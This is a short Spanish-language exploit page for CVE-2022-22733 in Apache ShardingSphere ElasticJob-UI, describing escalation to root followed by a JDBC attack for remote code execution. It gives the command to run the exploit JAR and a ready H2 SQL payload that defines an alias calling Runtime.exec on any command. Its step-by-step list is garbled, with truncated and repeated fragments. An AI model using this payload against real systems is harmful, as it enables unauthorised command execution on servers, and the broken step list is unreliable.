
Apache ShardingSphere ElasticJob-UI Escalada de Privilegios y Exploit de RCE
CVE-2022-22733 es una vulnerabilidad que afecta a Apache ShardingSphere ElasticJob-UI 3.0.0 y versiones anteriores. La vulnerabilidad conduce a una escalada de privilegios. Pero, abusando de los privilegios escalados, se puede realizar un ataque JDBC y lograr RCE. Puedes leer el análisis de la vulnerabilidad desde Aquí y el blog sobre la escritura del exploit paso a paso desde Aquí.

El exploit funciona de la siguiente manera:
accessToken generado de forma insegura.accessToken generado de forma insegura.accessToken.root de los datos analizados.root y obtener privilegios completos en la aplicación.Puedes descargar el archivo JAR desde aquí y el código fuente aquí.
jar:java -jar CVE-2022-22733.jar
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
